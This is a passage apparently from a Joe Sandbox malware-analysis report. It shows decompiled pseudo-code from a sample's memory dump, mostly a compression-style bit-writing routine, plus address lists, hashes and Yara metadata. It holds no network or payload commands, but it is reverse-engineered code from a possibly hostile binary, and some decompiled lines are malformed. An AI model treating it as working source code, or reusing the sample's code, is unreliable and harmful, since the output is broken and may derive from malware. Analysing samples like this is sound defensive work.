						 *(_t383 + 0x48) =  *(_t383 + 0x48) | ( *(( *_t208 & 0x000000ff) + _t383 + 0x9152) & 0x000000ff) << _t351;
						_t297 = _t351 + 3;
						 *(_t383 + 0x44) = _t297;
						if(_t297 >= 8) {
							do {
								_t352 =  *(_t383 + 0x30);
								if(_t352 <  *((intOrPtr*)(_t383 + 0x34))) {
									_t297 =  *(_t383 + 0x48);
									 *_t352 = _t297;
									 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
								}
								 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
								 *(_t383 + 0x44) =  *(_t383 + 0x44) + 0xfffffff8;
							} while ( *(_t383 + 0x44) >= 8);
						}
						_t375 = _t375 + 1;
					} while (_t375 < _t389);
					_t388 = 0;
				}
				if(_t337 != 0) {
					do {
						_t298 =  *(_t390 + _t388 - 0x160) & 0x000000ff;
						_t388 = _t388 + 1;
						_t347 =  *(_t383 + 0x44);
						_v16 = _t298;
						 *(_t383 + 0x48) =  *(_t383 + 0x48) | ( *(_t383 + 0x8cd2 + _t298 * 2) & 0x0000ffff) << _t347;
						_t301 = _t347 + ( *(_t383 + _t298 + 0x9152) & 0x000000ff);
						 *(_t383 + 0x44) = _t301;
						if(_t301 >= 8) {
							do {
								_t350 =  *(_t383 + 0x30);
								if(_t350 <  *((intOrPtr*)(_t383 + 0x34))) {
									 *_t350 =  *(_t383 + 0x48);
									 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
								}
								 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
								 *(_t383 + 0x44) =  *(_t383 + 0x44) + 0xfffffff8;
							} while ( *(_t383 + 0x44) >= 8);
						}
						_t297 = _v16;
						if(_t297 >= 0x10) {
							_t377 =  *(_t390 + _t388 - 0x160) & 0x000000ff;
							_t388 = _t388 + 1;
							_t348 =  *(_t383 + 0x44);
							_t297 = ( &__imp__IsProcessorFeaturePresent)[_t297] + _t348;
							 *(_t383 + 0x48) =  *(_t383 + 0x48) | _t377 << _t348;
							 *(_t383 + 0x44) = _t297;
							if(_t297 >= 8) {
								do {
									_t349 =  *(_t383 + 0x30);
									if(_t349 <  *((intOrPtr*)(_t383 + 0x34))) {
										_t297 =  *(_t383 + 0x48);
										 *_t349 = _t297;
										 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
									}
									 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
									 *(_t383 + 0x44) =  *(_t383 + 0x44) + 0xfffffff8;
								} while ( *(_t383 + 0x44) >= 8);
							}
						}
					} while (_t388 < _t337);
				}
				return _t297;
			}





























































                  0x00402f90
                  0x00402f94
                  0x00402fa3
                  0x00402faa
                  0x00402fb8
                  0x00402fbd
                  0x00402fc0
                  0x00402fc5
                  0x00402fcf
                  0x00402fd6
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00402fd6
                  0x00402fda
                  0x00402fdd
                  0x00402fde
                  0x00402fe8
                  0x00402fec
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00402fec
                  0x00402fee
                  0x00403000
                  0x00403019
                  0x00403024
                  0x00403026
                  0x0040302d
                  0x00403030
                  0x0040303b
                  0x00403041
                  0x00403044
                  0x0040304a
                  0x00403050
                  0x00403053
                  0x00403056
                  0x0040305d
                  0x00403062
                  0x004030eb
                  0x004030f0
                  0x004030f5
                  0x0040311e
                  0x00403134
                  0x0040313b
                  0x0040313e
                  0x00403120
                  0x00403120
                  0x00403127
                  0x0040312a
                  0x0040312a
                  0x00403146
                  0x0040314d
                  0x004030f7
                  0x004030f7
                  0x00403109
                  0x00403111
                  0x00403114
                  0x00403117
                  0x00403117
                  0x00403150
                  0x00403155
                  0x00403155
                  0x0040315a
                  0x004031cc
                  0x004031cd
                  0x004031d3
                  0x004031d5
                  0x004031dc
                  0x004031de
                  0x004031e8
                  0x00000000
                  0x004031e8
                  0x0040315c
                  0x0040315c
                  0x00403161
                  0x00403166
                  0x00403190
                  0x0040319a
                  0x004031a2
                  0x004031a9
                  0x00403168
                  0x0040316f
                  0x00403180
                  0x00403185
                  0x00403188
                  0x0040318b
                  0x0040318b
                  0x004031ae
                  0x004031ae
                  0x004031b4
                  0x004031bb
                  0x004031be
                  0x004031c6
                  0x004031c6
                  0x00403068
                  0x00403068
                  0x0040306d
                  0x00403072
                  0x00403099
                  0x004030a3
                  0x004030ab
                  0x004030b2
                  0x00403074
                  0x0040307b
                  0x0040308c
                  0x00403091
                  0x00403094
                  0x00403094
                  0x004030b7
                  0x004030b7
                  0x004030bd
                  0x004030c0
                  0x004030c1
                  0x004030ca
                  0x004030d0
                  0x004030d9
                  0x004030e3
                  0x004031eb
                  0x004031eb
                  0x004031eb
                  0x004030ca
                  0x004031f1
                  0x004031f4
                  0x004031fc
                  0x004031ff
                  0x004031ff
                  0x0040320a
                  0x00403253
                  0x00403258
                  0x0040327c
                  0x00403292
                  0x00403299
                  0x0040329c
                  0x0040327e
                  0x0040327e
                  0x00403285
                  0x00403288
                  0x00403288
                  0x004032a4
                  0x00000000
                  0x0040325a
                  0x0040325a
                  0x0040326c
                  0x00403271
                  0x00403274
                  0x00403274
                  0x00403258
                  0x0040320c
                  0x0040320f
                  0x00403236
                  0x00403240
                  0x00403248
                  0x004032ab
                  0x004032ab
                  0x00403211
                  0x00403218
                  0x00403229
                  0x0040322e
                  0x00403231
                  0x00403231
                  0x0040320f
                  0x0040320a
                  0x004032ae
                  0x004032af
                  0x004032b1
                  0x004032b5
                  0x004032ba
                  0x004032bf
                  0x004032c7
                  0x004032cc
                  0x004032cf
                  0x004032d2
                  0x004032d3
                  0x004032d8
                  0x004032da
                  0x004032da
                  0x004032e0
                  0x004032e5
                  0x004032e7
                  0x004032e7
                  0x004032ea
                  0x004032ee
                  0x004032f1
                  0x004032da
                  0x004032f6
                  0x00403303
                  0x00403306
                  0x00403309
                  0x0040330e
                  0x00403310
                  0x00403310
                  0x00403316
                  0x0040331b
                  0x0040331d
                  0x0040331d
                  0x00403320
                  0x00403324
                  0x00403327
                  0x00403310
                  0x0040332c
                  0x00403335
                  0x00403338
                  0x0040333b
                  0x00403340
                  0x00403342
                  0x00403342
                  0x00403348
                  0x0040334d
                  0x0040334f
                  0x0040334f
                  0x00403352
                  0x00403356
                  0x00403359
                  0x00403342
                  0x00403360
                  0x00403361
                  0x00403361
                  0x00403370
                  0x00000000
                  0x00000000
                  0x00403372
                  0x00403373
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403373
                  0x00403375
                  0x0040337a
                  0x0040337d
                  0x00403380
                  0x00403383
                  0x0040338b
                  0x0040338e
                  0x00403391
                  0x00403396
                  0x00403398
                  0x00403398
                  0x0040339e
                  0x004033a0
                  0x004033a3
                  0x004033a5
                  0x004033a5
                  0x004033a8
                  0x004033ac
                  0x004033af
                  0x00403398
                  0x004033b4
                  0x004033b6
                  0x004033bb
                  0x004033bd
                  0x004033c0
                  0x004033c0
                  0x004033c7
                  0x004033d4
                  0x004033d7
                  0x004033da
                  0x004033e0
                  0x004033e2
                  0x004033e2
                  0x004033e8
                  0x004033ea
                  0x004033ed
                  0x004033ef
                  0x004033ef
                  0x004033f2
                  0x004033f6
                  0x004033fa
                  0x004033e2
                  0x00403400
                  0x00403401
                  0x00403405
                  0x00403405
                  0x00403409
                  0x0040340f
                  0x0040340f
                  0x00403417
                  0x00403418
                  0x0040341b
                  0x00403430
                  0x00403433
                  0x00403436
                  0x0040343c
                  0x0040343e
                  0x0040343e
                  0x00403444
                  0x00403449
                  0x0040344b
                  0x0040344b
                  0x0040344e
                  0x00403452
                  0x00403456
                  0x0040343e
                  0x0040345c
                  0x00403462
                  0x00403464
                  0x0040346c
                  0x00403474
                  0x00403477
                  0x0040347b
                  0x0040347e
                  0x00403484
                  0x00403486
                  0x00403486
                  0x0040348c
                  0x0040348e
                  0x00403491
                  0x00403493
                  0x00403493
                  0x00403496
                  0x0040349a
                  0x0040349e
                  0x00403486
                  0x00403484
                  0x004034a4
                  0x0040340f
                  0x004034b2

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: _memset$memset$memcpy
                  • String ID: 0HCw
                  • API String ID: 1551266493-3134391196
                  • Opcode ID: 2e1f4a3d71298718943c742f06d25169e691f0727c0f0a72c82688ee7d13fe6c
                  • Instruction ID: ca43e400cc7215004ac780a32a62955417f8f7f80a22650c2bf1bec3b8deea9e
                  • Opcode Fuzzy Hash: 2e1f4a3d71298718943c742f06d25169e691f0727c0f0a72c82688ee7d13fe6c
                  • Instruction Fuzzy Hash: 46024830900666EFCB16CF68C9C56EABF74FF45301F14017AC855A7782C73AAA25CB98
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 004037A9, Relevance: 7.9, APIs: 3, Strings: 2, Instructions: 416UNIQUECrypto
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E004037A9(intOrPtr* __ecx, intOrPtr __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				int _v16;
				intOrPtr _v20;
				intOrPtr _t271;
				signed char _t279;
				intOrPtr _t283;
				intOrPtr _t291;
				signed int _t299;
				signed int _t300;
				signed char _t303;
				signed char _t306;
				signed char _t315;
				signed char _t324;
				signed char _t327;
				signed char _t333;
				signed int _t342;
				signed char _t344;
				signed char _t348;
				intOrPtr _t357;
				signed int _t358;
				void* _t359;
				void* _t362;
				intOrPtr _t363;
				signed char _t366;
				intOrPtr _t367;
				signed char _t370;
				signed char _t371;
				signed char _t372;
				char* _t373;
				char* _t374;
				char* _t375;
				signed char _t376;
				char* _t377;
				char* _t378;
				signed char _t382;
				signed char _t383;
				signed char _t384;
				char* _t385;
				char* _t386;
				char* _t387;
				char* _t388;
				char* _t393;
				signed char _t394;
				signed char _t395;
				char* _t396;
				char* _t397;
				intOrPtr _t398;
				int _t400;
				intOrPtr _t401;
				void* _t402;
				signed int _t403;
				signed int _t404;
				void* _t406;
				void* _t410;
				intOrPtr _t411;
				int _t414;
				void* _t415;
				signed char _t416;
				intOrPtr* _t417;

				_t417 = __ecx;
				_t357 = __edx;
				_v20 = __edx;
				_v16 = 0;
				if(( *(__ecx + 8) & 0x00080000) == 0 ||  *((intOrPtr*)(__ecx + 0x1c)) -  *((intOrPtr*)(__ecx + 0x40)) >  *((intOrPtr*)(__ecx + 0x24))) {
					_t400 = 0;
				} else {
					_t400 = 1;
				}
				if( *_t417 != 0) {
					L7:
					_t271 = _t417 + 0x39272;
					goto L8;
				} else {
					_t398 =  *((intOrPtr*)(_t417 + 0x8c));
					if( *((intOrPtr*)( *((intOrPtr*)(_t417 + 0x7c)))) - _t398 < 0x14ccc) {
						goto L7;
					} else {
						_t271 =  *((intOrPtr*)(_t417 + 0x74)) + _t398;
						L8:
						 *((intOrPtr*)(_t417 + 0x30)) = _t271;
						_v12 = _t271;
						 *((intOrPtr*)(_t417 + 0x34)) = _t271 + 0x14cbc;
						 *(_t417 + 0x58) = 0;
						 *((intOrPtr*)(_t417 + 0x5c)) = 0;
						 *( *(_t417 + 0x2c)) =  *( *(_t417 + 0x2c)) >>  *(_t417 + 0x38);
						_t410 = 8;
						 *((intOrPtr*)(_t417 + 0x28)) =  *((intOrPtr*)(_t417 + 0x28)) - (0 |  *(_t417 + 0x38) == _t410);
						if(( *(_t417 + 8) & 0x00001000) == 0 ||  *((intOrPtr*)(_t417 + 0x64)) != 0) {
							L18:
							_t366 =  *(_t417 + 0x44);
							 *(_t417 + 0x48) =  *(_t417 + 0x48) | (0 | _t357 == 0x00000004) << _t366;
							_t64 = _t366 + 1; // 0xf9
							_t279 = _t64;
							 *(_t417 + 0x44) = _t279;
							if(_t279 < _t410) {
								L22:
								_t411 =  *((intOrPtr*)(_t417 + 0x30));
								_t358 =  *(_t417 + 0x44);
								_v8 =  *(_t417 + 0x48);
								if(_t400 != 0) {
									_t401 = _v16;
									L47:
									if( *((intOrPtr*)(_t417 + 0x1c)) -  *((intOrPtr*)(_t417 + 0x40)) >  *((intOrPtr*)(_t417 + 0x24))) {
										L28:
										if(_t401 == 0) {
											_t87 =  &_v8; // 0x40473a
											 *(_t417 + 0x48) =  *_t87;
											 *((intOrPtr*)(_t417 + 0x30)) = _t411;
											 *(_t417 + 0x44) = _t358;
											E0040378E(_t417, _t401 + 1);
										}
										_t359 = 2;
										L31:
										_t283 = _v20;
										if(_t283 == 0) {
											L84:
											memset(_t417 + 0x8192, 0, 0x240);
											memset(_t417 + 0x83d2, 0, 0x40);
											 *(_t417 + 0x38) = 8;
											 *((intOrPtr*)(_t417 + 0x28)) = _t417 + 0x9273;
											 *(_t417 + 0x2c) = _t417 + 0x9272;
											 *((intOrPtr*)(_t417 + 0x40)) =  *((intOrPtr*)(_t417 + 0x40)) +  *(_t417 + 0x3c);
											 *((intOrPtr*)(_t417 + 0x64)) =  *((intOrPtr*)(_t417 + 0x64)) + 1;
											_t291 = _v12;
											 *(_t417 + 0x3c) = 0;
											_t362 =  *((intOrPtr*)(_t417 + 0x30)) - _t291;
											if(_t362 == 0) {
												L92:
												return  *((intOrPtr*)(_t417 + 0x5c));
											}
											if( *_t417 == 0) {
												_t402 = _t417 + 0x39272;
												if(_t291 != _t402) {
													 *((intOrPtr*)(_t417 + 0x8c)) =  *((intOrPtr*)(_t417 + 0x8c)) + _t362;
												} else {
													_t367 =  *((intOrPtr*)(_t417 + 0x8c));
													_t414 =  <  ? _t362 :  *((intOrPtr*)( *((intOrPtr*)(_t417 + 0x7c)))) - _t367;
													memcpy( *((intOrPtr*)(_t417 + 0x74)) + _t367, _t402, _t414);
													 *((intOrPtr*)(_t417 + 0x8c)) =  *((intOrPtr*)(_t417 + 0x8c)) + _t414;
													_t363 = _t362 - _t414;
													if(_t363 != 0) {
														 *(_t417 + 0x58) = _t414;
														 *((intOrPtr*)(_t417 + 0x5c)) = _t363;
													}
												}
												goto L92;
											}
											 *((intOrPtr*)( *((intOrPtr*)(_t417 + 0x78)))) =  *((intOrPtr*)(_t417 + 0x84)) -  *((intOrPtr*)(_t417 + 0x70));
											_t299 =  *_t417(_t417 + 0x39272, _t362,  *((intOrPtr*)(_t417 + 4)));
											if(_t299 != 0) {
												goto L92;
											}
											_t300 = _t299 | 0xffffffff;
											 *(_t417 + 0x6c) = _t300;
											return _t300;
										}
										_t370 =  *(_t417 + 0x44);
										_t415 = 4;
										if(_t283 != _t415) {
											_t403 = 0;
											 *(_t417 + 0x48) =  *(_t417 + 0x48) | 0 << _t370;
											_t303 = _t370 + 3;
											 *(_t417 + 0x44) = _t303;
											if(_t303 < 8) {
												L74:
												_t371 =  *(_t417 + 0x44);
												if(_t371 == 0) {
													do {
														L79:
														_t372 =  *(_t417 + 0x44);
														 *(_t417 + 0x48) =  *(_t417 + 0x48) | (_t403 & 0x0000ffff) << _t372;
														_t227 = _t372 + 0x10; // 0x18
														_t306 = _t227;
														 *(_t417 + 0x44) = _t306;
														if(_t306 < 8) {
															goto L83;
														} else {
															goto L80;
														}
														do {
															L80:
															_t373 =  *((intOrPtr*)(_t417 + 0x30));
															if(_t373 <  *((intOrPtr*)(_t417 + 0x34))) {
																 *_t373 =  *(_t417 + 0x48);
																 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
															}
															 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
															 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
														} while ( *(_t417 + 0x44) >= 8);
														L83:
														_t403 = _t403 ^ 0x0000ffff;
														_t359 = _t359 - 1;
													} while (_t359 != 0);
													goto L84;
												}
												 *(_t417 + 0x44) = 8;
												 *(_t417 + 0x48) =  *(_t417 + 0x48) | 0 << _t371;
												do {
													_t374 =  *((intOrPtr*)(_t417 + 0x30));
													if(_t374 <  *((intOrPtr*)(_t417 + 0x34))) {
														 *_t374 =  *(_t417 + 0x48);
														 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
													}
													 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
													 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
												} while ( *(_t417 + 0x44) >= 8);
												goto L79;
											} else {
												goto L71;
											}
											do {
												L71:
												_t375 =  *((intOrPtr*)(_t417 + 0x30));
												if(_t375 <  *((intOrPtr*)(_t417 + 0x34))) {
													 *_t375 =  *(_t417 + 0x48);
													 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
												}
												 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
												 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
											} while ( *(_t417 + 0x44) >= 8);
											goto L74;
										}
										if(_t370 == 0) {
											L38:
											if(( *(_t417 + 8) & 0x00001000) == 0) {
												goto L84;
											}
											_t404 =  *(_t417 + 0x18);
											do {
												_t376 =  *(_t417 + 0x44);
												 *(_t417 + 0x48) =  *(_t417 + 0x48) | _t404 >> 0x00000018 << _t376;
												_t113 = _t376 + 8; // 0x10
												_t315 = _t113;
												 *(_t417 + 0x44) = _t315;
												if(_t315 < 8) {
													goto L44;
												} else {
													goto L41;
												}
												do {
													L41:
													_t377 =  *((intOrPtr*)(_t417 + 0x30));
													if(_t377 <  *((intOrPtr*)(_t417 + 0x34))) {
														 *_t377 =  *(_t417 + 0x48);
														 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
													}
													 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
													 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
												} while ( *(_t417 + 0x44) >= 8);
												L44:
												_t404 = _t404 << 8;
												_t415 = _t415 - 1;
											} while (_t415 != 0);
											goto L84;
										}
										 *(_t417 + 0x44) = 8;
										 *(_t417 + 0x48) =  *(_t417 + 0x48) | 0 << _t370;
										do {
											_t378 =  *((intOrPtr*)(_t417 + 0x30));
											if(_t378 <  *((intOrPtr*)(_t417 + 0x34))) {
												 *_t378 =  *(_t417 + 0x48);
												 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
											}
											 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
											 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
										} while ( *(_t417 + 0x44) >= 8);
										goto L38;
									}
									 *((intOrPtr*)(_t417 + 0x30)) = _t411;
									_t130 =  &_v8; // 0x40473a
									 *(_t417 + 0x48) = 0 << _t358 |  *_t130;
									_t324 = _t358 + 2;
									_t416 = 8;
									 *(_t417 + 0x44) = _t324;
									if(_t324 < _t416) {
										L52:
										_t382 =  *(_t417 + 0x44);
										if(_t382 == 0) {
											L57:
											_t359 = 2;
											_t406 = _t359;
											do {
												_t383 =  *(_t417 + 0x44);
												 *(_t417 + 0x48) =  *(_t417 + 0x48) | ( *(_t417 + 0x3c) & 0x0000ffff) << _t383;
												_t162 = _t383 + 0x10; // 0x108
												_t327 = _t162;
												 *(_t417 + 0x44) = _t327;
												if(_t327 < _t416) {
													goto L62;
												} else {
													goto L59;
												}
												do {
													L59:
													_t386 =  *((intOrPtr*)(_t417 + 0x30));
													if(_t386 <  *((intOrPtr*)(_t417 + 0x34))) {
														 *_t386 =  *(_t417 + 0x48);
														 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
													}
													 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
													 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
												} while ( *(_t417 + 0x44) >= _t416);
												L62:
												 *(_t417 + 0x3c) =  *(_t417 + 0x3c) ^ 0x0000ffff;
												_t406 = _t406 - 1;
											} while (_t406 != 0);
											if( *(_t417 + 0x3c) <= _t406) {
												goto L31;
											} else {
												goto L64;
											}
											do {
												L64:
												_t384 =  *(_t417 + 0x44);
												 *(_t417 + 0x48) =  *(_t417 + 0x48) | ( *(( *((intOrPtr*)(_t417 + 0x40)) + _t406 & 0x00007fff) + _t417 + 0x90) & 0x000000ff) << _t384;
												_t183 = _t384 + 8; // 0x100
												_t333 = _t183;
												 *(_t417 + 0x44) = _t333;
												if(_t333 < _t416) {
													goto L68;
												} else {
													goto L65;
												}
												do {
													L65:
													_t385 =  *((intOrPtr*)(_t417 + 0x30));
													if(_t385 <  *((intOrPtr*)(_t417 + 0x34))) {
														 *_t385 =  *(_t417 + 0x48);
														 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
													}
													 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
													 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
												} while ( *(_t417 + 0x44) >= _t416);
												L68:
												_t406 = _t406 + 1;
											} while (_t406 <  *(_t417 + 0x3c));
											goto L31;
										}
										 *(_t417 + 0x44) = _t416;
										 *(_t417 + 0x48) =  *(_t417 + 0x48) | 0 << _t382;
										do {
											_t387 =  *((intOrPtr*)(_t417 + 0x30));
											if(_t387 <  *((intOrPtr*)(_t417 + 0x34))) {
												 *_t387 =  *(_t417 + 0x48);
												 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
											}
											 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
											 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
										} while ( *(_t417 + 0x44) >= _t416);
										goto L57;
									} else {
										goto L49;
									}
									do {
										L49:
										_t388 =  *((intOrPtr*)(_t417 + 0x30));
										if(_t388 <  *((intOrPtr*)(_t417 + 0x34))) {
											 *_t388 =  *(_t417 + 0x48);
											 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
										}
										 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
										 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
									} while ( *(_t417 + 0x44) >= _t416);
									goto L52;
								}
								if(( *(_t417 + 8) & 0x00040000) != 0 ||  *(_t417 + 0x3c) < 0x30) {
									_t400 = 1;
								}
								_t401 = E0040378E(_t417, _t400);
								if( *(_t417 + 0x3c) == 0 ||  *((intOrPtr*)(_t417 + 0x30)) - _t411 + 1 <  *(_t417 + 0x3c)) {
									goto L28;
								} else {
									goto L47;
								}
							} else {
								goto L19;
							}
							do {
								L19:
								_t393 =  *((intOrPtr*)(_t417 + 0x30));
								if(_t393 <  *((intOrPtr*)(_t417 + 0x34))) {
									 *_t393 =  *(_t417 + 0x48);
									 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
								}
								 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
								 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
							} while ( *(_t417 + 0x44) >= _t410);
							goto L22;
						} else {
							_t394 =  *(_t417 + 0x44);
							_t342 = 0x78;
							 *(_t417 + 0x48) =  *(_t417 + 0x48) | _t342 << _t394;
							_t344 = _t394 + 8;
							 *(_t417 + 0x44) = _t344;
							if(_t344 < _t410) {
								L14:
								_t395 =  *(_t417 + 0x44);
								 *(_t417 + 0x48) =  *(_t417 + 0x48) | 1 << _t395;
								_t47 = _t395 + 8; // 0x100
								_t348 = _t47;
								 *(_t417 + 0x44) = _t348;
								if(_t348 < _t410) {
									goto L18;
								} else {
									goto L15;
								}
								do {
									L15:
									_t396 =  *((intOrPtr*)(_t417 + 0x30));
									if(_t396 <  *((intOrPtr*)(_t417 + 0x34))) {
										 *_t396 =  *(_t417 + 0x48);
										 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
									}
									 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
									 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
								} while ( *(_t417 + 0x44) >= _t410);
								goto L18;
							} else {
								goto L11;
							}
							do {
								L11:
								_t397 =  *((intOrPtr*)(_t417 + 0x30));
								if(_t397 <  *((intOrPtr*)(_t417 + 0x34))) {
									 *_t397 =  *(_t417 + 0x48);
									 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
								}
								 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
								 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
							} while ( *(_t417 + 0x44) >= _t410);
							goto L14;
						}
					}
				}
			}































































                  0x004037b1
                  0x004037b3
                  0x004037b8
                  0x004037bb
                  0x004037c5
                  0x004037d7
                  0x004037d2
                  0x004037d4
                  0x004037d4
                  0x004037db
                  0x004037f8
                  0x004037f8
                  0x00000000
                  0x004037dd
                  0x004037e0
                  0x004037ef
                  0x00000000
                  0x004037f1
                  0x004037f4
                  0x004037fe
                  0x00403801
                  0x00403804
                  0x0040380c
                  0x00403812
                  0x00403815
                  0x0040381a
                  0x0040381e
                  0x00403825
                  0x0040382f
                  0x0040389b
                  0x0040389b
                  0x004038a8
                  0x004038ab
                  0x004038ab
                  0x004038ae
                  0x004038b3
                  0x004038d2
                  0x004038d5
                  0x004038d8
                  0x004038db
                  0x004038e0
                  0x004039cb
                  0x004039ce
                  0x004039d7
                  0x00403916
                  0x00403918
                  0x0040391a
                  0x0040391e
                  0x00403923
                  0x00403926
                  0x00403929
                  0x00403929
                  0x00403930
                  0x00403931
                  0x00403931
                  0x00403936
                  0x00403b7d
                  0x00403b8c
                  0x00403b9c
                  0x00403ba8
                  0x00403baf
                  0x00403bbb
                  0x00403bc1
                  0x00403bc4
                  0x00403bc7
                  0x00403bca
                  0x00403bd0
                  0x00403bd2
                  0x00403c48
                  0x00000000
                  0x00403c48
                  0x00403bd7
                  0x00403c03
                  0x00403c0b
                  0x00403c42
                  0x00403c0d
                  0x00403c10
                  0x00403c1f
                  0x00403c27
                  0x00403c2d
                  0x00403c36
                  0x00403c38
                  0x00403c3a
                  0x00403c3d
                  0x00403c3d
                  0x00403c38
                  0x00000000
                  0x00403c0b
                  0x00403be5
                  0x00403bf2
                  0x00403bf9
                  0x00000000
                  0x00000000
                  0x00403bfb
                  0x00403bfe
                  0x00000000
                  0x00403bfe
                  0x0040393c
                  0x00403941
                  0x00403944
                  0x00403add
                  0x00403ae1
                  0x00403ae4
                  0x00403ae7
                  0x00403aed
                  0x00403b0d
                  0x00403b0d
                  0x00403b12
                  0x00403b40
                  0x00403b40
                  0x00403b40
                  0x00403b48
                  0x00403b4b
                  0x00403b4b
                  0x00403b4e
                  0x00403b54
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403b56
                  0x00403b56
                  0x00403b56
                  0x00403b5c
                  0x00403b61
                  0x00403b63
                  0x00403b63
                  0x00403b66
                  0x00403b6a
                  0x00403b6e
                  0x00403b74
                  0x00403b74
                  0x00403b7a
                  0x00403b7a
                  0x00000000
                  0x00403b40
                  0x00403b16
                  0x00403b1f
                  0x00403b22
                  0x00403b22
                  0x00403b28
                  0x00403b2d
                  0x00403b2f
                  0x00403b2f
                  0x00403b32
                  0x00403b36
                  0x00403b3a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403aef
                  0x00403aef
                  0x00403aef
                  0x00403af5
                  0x00403afa
                  0x00403afc
                  0x00403afc
                  0x00403aff
                  0x00403b03
                  0x00403b07
                  0x00000000
                  0x00403aef
                  0x0040394c
                  0x0040397a
                  0x00403981
                  0x00000000
                  0x00000000
                  0x00403987
                  0x0040398a
                  0x0040398a
                  0x00403994
                  0x00403997
                  0x00403997
                  0x0040399a
                  0x004039a0
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004039a2
                  0x004039a2
                  0x004039a2
                  0x004039a8
                  0x004039ad
                  0x004039af
                  0x004039af
                  0x004039b2
                  0x004039b6
                  0x004039ba
                  0x004039c0
                  0x004039c0
                  0x004039c3
                  0x004039c3
                  0x00000000
                  0x004039c6
                  0x00403950
                  0x00403959
                  0x0040395c
                  0x0040395c
                  0x00403962
                  0x00403967
                  0x00403969
                  0x00403969
                  0x0040396c
                  0x00403970
                  0x00403974
                  0x00000000
                  0x0040395c
                  0x004039df
                  0x004039e6
                  0x004039eb
                  0x004039ee
                  0x004039f1
                  0x004039f2
                  0x004039f7
                  0x00403a16
                  0x00403a16
                  0x00403a1b
                  0x00403a44
                  0x00403a46
                  0x00403a47
                  0x00403a49
                  0x00403a49
                  0x00403a52
                  0x00403a55
                  0x00403a55
                  0x00403a58
                  0x00403a5d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403a5f
                  0x00403a5f
                  0x00403a5f
                  0x00403a65
                  0x00403a6a
                  0x00403a6c
                  0x00403a6c
                  0x00403a6f
                  0x00403a73
                  0x00403a77
                  0x00403a7c
                  0x00403a7c
                  0x00403a83
                  0x00403a83
                  0x00403a89
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403a8f
                  0x00403a8f
                  0x00403a92
                  0x00403aa6
                  0x00403aa9
                  0x00403aa9
                  0x00403aac
                  0x00403ab1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403ab3
                  0x00403ab3
                  0x00403ab3
                  0x00403ab9
                  0x00403abe
                  0x00403ac0
                  0x00403ac0
                  0x00403ac3
                  0x00403ac7
                  0x00403acb
                  0x00403ad0
                  0x00403ad0
                  0x00403ad1
                  0x00000000
                  0x00403ad6
                  0x00403a1f
                  0x00403a24
                  0x00403a27
                  0x00403a27
